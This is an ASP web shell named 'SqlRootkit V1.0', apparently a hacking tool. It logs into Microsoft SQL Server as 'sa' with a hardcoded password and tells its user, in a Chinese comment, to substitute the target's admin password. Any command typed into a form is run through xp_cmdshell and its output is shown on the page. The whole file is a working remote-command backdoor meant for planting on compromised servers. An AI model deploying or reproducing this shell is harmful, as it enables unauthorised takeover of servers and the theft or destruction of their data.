<% set adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open "Provider=SQLOLEDB.1;Password=server;User ID=sa" '请将www.96cn.com改为目标的SQL管理密码 If request.form("cmd")<>"" Then strQuery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'" set recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0) recResult.MoveNext Loop End if set recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") strResult = Replace(strResult,chr(13),"
") ' and so on... End if set adoConn = Nothing %> ∷ SqlRootkit - by 无言 ∷
">    SqlRootkit V1.0 -- by 无言
<% Response.Write request.form("cmd") & "

" Response.Write strResult %>